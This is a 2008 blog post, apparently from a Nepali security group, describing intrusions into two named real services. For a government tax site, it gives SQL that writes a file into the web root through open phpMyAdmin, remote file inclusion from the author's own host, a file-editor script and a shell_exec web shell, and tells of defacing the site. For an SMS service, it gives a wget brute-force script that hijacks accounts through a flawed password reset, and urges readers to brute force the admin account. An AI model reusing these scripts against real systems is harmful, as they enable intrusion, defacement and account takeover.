Do Comment and I shall comment back. Your contributions are always welcome at emailadimn@gmail.com.
Nepali Security Community Accessible at NepSecure Google Groups

Sunday, January 6, 2008

Nepal Government's Inland Revenue Department (web.ird.gov.np) (Nepali) Website Cracked

please do not take this posting as an offense against your website. Our motive is to let you know insecurities in your website and also give options to improve them.

Information
Its been quite some time the inland revenue department's website was upped, there are features like e-pan, filling PAN bills, tax bills online. The website lists the general idea about IRD and stuffs.

Level of Vulnerability
9/10 - i was able to run commands, DOS commands in it!! del C:\*.*, kidding!!

Background
The website actually seems to be hosted in two different servers,
1) http://ird.gov.np
$ nslookup ird.gov.np
Non-authoritative answer:
Name: ird.gov.np
Address: 63.219.2.40

2) another subdomain, http://web.ird.gov.np
nslookup web.ird.gov.np
Non-authoritative answer:
Name: web.ird.gov.np
Address: 116.90.235.4

Looking at the website, information is arranged in pages, the urls have page=xyz type of syntax, umm, XSS?? and the table based layout! (1980s? albiet exageration) and the background image repeating in x, they can't even create a css entry, repeat: none; Optimized for 800x640 resolution and they forgot 1024x768?? Overall, very very disappointed. Footer has "Designed and Developed by Professional Computer System" What a shame!!

The Crack
Strangely I dont know why, I typed http://web.ird.gov.np/phpmyadmin/ and to my delight, it was unsecured!! unprotected virgin phpmyadmin, Althought the databases were empty. Meaning the core database is somewhere else, pirated Oracle Server ;-) my guess only!

So, Im stuck with a virgin phpmyadmin, what more can be done?
An hour of research!! and I found out that there is actually a mysql syntax to store output to a file!

Here is what I did,
Step
1) Went to the Query Section of PHPMyadmin
2) Execute this SQL
select "" into outfile '/url/to/www/root/page.php'

3) Hurrah! we got a working page.php ie, http://web.ird.gov.np/pan/page.php that takes arguement a url to a any file, also remote file! YES it can be this easy!
example, http://web.ird.gov.np/pan/page.php?page=http://someaddress/c.txt?asdf :-) NICE

4) Fire up my localserver, user ip address, say 10.10.10.10 (assuming)

5) First I executed this php script
1 <?php
2 $a = '
3 <?php
4 // if not empty $_POST["fname"] then save the content
5 if (!empty($_POST["fname"])) {
6 echo "Save Now";
7 file_put_contents($_POST["fname"], $_POST["fc"]); // by default overwrite, put FILE_APPEND as 3rd arguement to append
8 }
9 else
10 {
11 echo "No Save";
12 }
13
14 $f = file_get_contents($_GET["f"]); ?>
15 <form method="post">
16 <input type=hidden value=<?php echo $_GET["f"];?> name=fname />
17 <textarea rows=25 cols=100 name=fc><?php echo $f; ?></textarea>
18 <input type=submit value="save">
19 </form>
20 <?php echo $_POST["fname"]; ?>
21 <pre>
22 <? echo htmlspecialchars(stripslashes($_POST["fc"]),ENT_QUOTES); ?>
23 </pre>';
24
25 file_put_contents('./sth.php',$a);
26 echo "Output successful";
27 ?>


What it does is, saves the php
1 <?php
2 // if not empty $_POST["fname"] then save the content
3 if (!empty($_POST["fname"])) {
4 echo "Save Now";
5 file_put_contents($_POST["fname"], stripslashes($_POST["fc"])); // by default overwrite, put FILE_APPEND as 3rd arguement to append
6 }
7 else
8 {
9 echo "No Save";
10 }
11
12 $f = file_get_contents($_GET["f"]); ?>
13 <form method="post">
14 <input type=hidden value=<?php echo $_GET["f"];?> name=fname />
15 <textarea rows=25 cols=100 name=fc><?php echo $f; ?></textarea>
16 <input type=submit value="save">
17 </form>
18 <?php echo $_POST["fname"]; ?>
19 <pre>
20 <?php echo htmlspecialchars(stripslashes($_POST["fc"]),ENT_QUOTES); ?>
21 </pre>


Under filename sth.php, but then what does sth.php do? if you see the arguements it takes the get arguement f as the filename, loads the file from server, ready to be edited, works like a charm
1 <?php $f = file_get_contents($_GET["f"]); ?>


6) How did i execute it? renamed the script to c.txt and run
http://web.ird.gov.np/pan/page.php?page=http://10.10.10.10/c.txt?asdf and voila, i have a brand new sth.php to work with,

7) As a part of demo, I edited footer.php file to put hacked by n00b in it, here is a screen capture



8) Lastly to have some fun, i created a php file to run any commands by using system() function, here is the php file

1 <?php
2 if (!empty($_POST["test"])) {
3 $output = $_POST["test"]."2>&1";
4 echo "<pre>" . shell_exec($output) . "</pre>";
5 }?>
6 <form method="post">
7 <input name="test"/>
8 <input type="submit" value="send"/>
9 </form>


The server was unsecured Wamp, so i could do dir, copy, move, it was a virtual DOS!! :-D

How to fix it?
Well Duh!! Wamp is for home user, and for production use, it should be secured!! see wamp homepage for more details!

The admins of http://ird.gov.np have already been informed, and they have fixed it up very quickly, im glad, but the design looks same, no improvement, no nothing.

Atleast it wasn't another iranian hack!! Im not all badass! :-D

Unauthrized Access / Hijack NTC WebSMS Account

please do not take this posting as an offense against your website. Our motive is to let you know insecurities in your website and also give options to improve them.

Information
NTC WebSMS is a very popular service to send sms to any NTC's Namaste SIM Card holding user from their website. At most, one can send 10 SMS per day and this service is totally free, althought with a twist. The service is available to only NTC SIM card holder since to get an account, you need to fill in your SIM's pin number. Fine!!

When an sms is sent, the recipient receives a SMS from 2424 with the original number as the sender, as a header in SMS. This is how the recipient knows who sent the SMS.


Level of Vulnerability

7/10 since hijacking other's account is possible, but then you cannot do any other fun stuffs than to send SMS through this account.

The Flaw
I wonder what people think when they create a software. Do they think OMG, i got to finish this application ASAP, im drunk and its due tomorrow! Probably not, but then the password reset option in the website is seriously flawed!!

Steps involved in resetting password.
1) Go to login page, click forgot password
2) Put the cell phone number account, 9841123456(example), click Submit
3) You are given the message that the password has BEEN RESET and to see the email for further details.

Oh, now anyone can submit my cell phone number and hit submit, its instantly changed and oh the next time i try to login, i cannot, because the password has been changed by some pycho and i wasn't asked for any confirmation. LAME LAME!! I have to then manually open my related email address and then search for the email.

Disection of the new password
I got the email alright with my new password, it strikingly looks predictible, the format of the new password
if my username is 9841123456, my password is set to 9841123456XXX.0

Cough! Cough! the XXX is some randomly chosen number, could be 000 or 512 or any ther number between 000 to 999.


The Hack
You must have guessed it by now, but I still list the steps for everyone's convinience

To hack the websms account of 9841123456, follow following steps
Step
1) Go to login page, click on forgot password and type 9841123456, hit submit
2) Since the new password is gone to the original owner, we will now brute force WebSMS!
3) In my case, i created a shell script in bash, use wget to send post variables username and password that will randomly try passwords 9841123456000.0 to 9841123456999.0
4) The returned file is saved to 000.txt to 999.txt (Yes 1000 txt files)
5) I see the result, sort the files according to file size
6) The page saying username/password invalid is 3KB in size while page with successful login is around 16KB in size.
7) So if the file 512.txt is bigger than all the rest, the new password is 9841123456512.0
8) Login to websms using this password, go to Options and change settings, ie the primary email so that next time anyone tries to reset the password, i get the new SMS!


Script
Save the following lines of code as pwfinder.sh, give executable permission to it, change the value of b to any username
b=9841123456
a=000
while [ $a -lt 1000 ]
do
wget http://websms.ntc.net.np/websmss/login.jsp --post-data="username=$b&password=$b$a.0&flag=1" -O $a.txt
((a=a+1))
done


Pretty simple,
I did put an & at the last of wget so it ran in background, but then the number of connection at a time to ntc's web server were very high, and was giving weird results. Without the &, there is at most, one connection to NTC's websms werver, so results were as expected.

Find out which file is the biggest, use ur fav file browser, in my case
$ du . -a | sort -n and i can see the file at the bottom.

Cheers All
Happy cracking

PS. Do brute force the username admin, i saw some pretty nice links in it!!